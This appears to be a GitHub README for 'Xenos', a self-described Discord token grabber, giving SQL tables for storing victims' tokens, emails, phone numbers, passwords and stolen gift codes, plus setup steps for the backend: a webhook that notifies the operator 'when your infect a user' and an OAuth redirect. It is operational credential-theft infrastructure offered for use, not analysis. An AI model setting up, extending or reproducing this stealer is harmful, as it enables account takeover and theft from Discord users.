Stars: 217
Forks: 76
Pull Requests: 3
Issues: 27
Watchers: 5
Last Updated: 2022-05-01 20:13:28
🐺 Official repository of Xenos, a token grabber and token manager in web, can't delete your webhook, just ratelimit it :/
License: GNU General Public License v3.0
Languages: Python, PHP, CSS, JavaScript, C#, Go
CREATE TABLE `gifts` (
`id` int(11) NOT NULL,
`gift_name` varchar(100) NOT NULL,
`start_date` varchar(100) NOT NULL,
`end_date` varchar(100) NOT NULL,
`code` varchar(100) NOT NULL,
`claim_at` varchar(100) NOT NULL,
`steal_date` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
CREATE TABLE `tokens` (
`user_id` text NOT NULL,
`username` text NOT NULL,
`avatar` text NOT NULL,
`email` text NOT NULL,
`phone` text NOT NULL,
`badges` int(10) NOT NULL,
`nitro_badges` int(10) NOT NULL,
`twofactor` varchar(100) NOT NULL,
`token` text NOT NULL,
`isflaged` int(10) NOT NULL,
`password` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
ALTER TABLE `gifts`
ADD PRIMARY KEY (`id`);
ALTER TABLE `gifts`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
COMMIT;
Inc/database.php
and put your hostname, database, username, passwordInc/fonctions.php
and put:
PASSWORD FOR API
by a password for using our api and remove a tokenYOUR DISCORD WEBHOOK
by your webhook for receive notifications when your infect a useryoursite.com
by your website url and on https://discord.com/developers on your application in oauth section create a redirect and paste http://yoursite.com/async/login
(with your website please your are not stupid),
array("922450497074495539", "957329295603269652")
)Put a stars and follow me for more ❤️